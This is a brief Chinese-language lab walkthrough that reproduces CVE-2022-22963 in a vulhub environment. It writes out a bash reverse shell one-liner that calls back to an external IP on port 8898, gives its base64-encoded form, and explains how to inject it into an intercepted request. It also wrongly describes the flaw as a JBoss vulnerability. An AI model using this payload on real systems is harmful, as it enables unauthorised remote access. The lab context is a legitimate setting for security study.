vulhub远程执行命令漏洞CVE-2022-22963
1.开启环境
2.访问目标网址,是关于JBoss中间件的漏洞
3.构造反弹shell的payload
将其进行base64编码
bash -i >& /dev/tcp/47.121.191.208/8898 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC84ODk4IDA+JjE=
4.通过抓包,将payload带进数据包中,放行
5.云服务器进行监听8898端口
6.放行后弹到shell,执行ls测试一下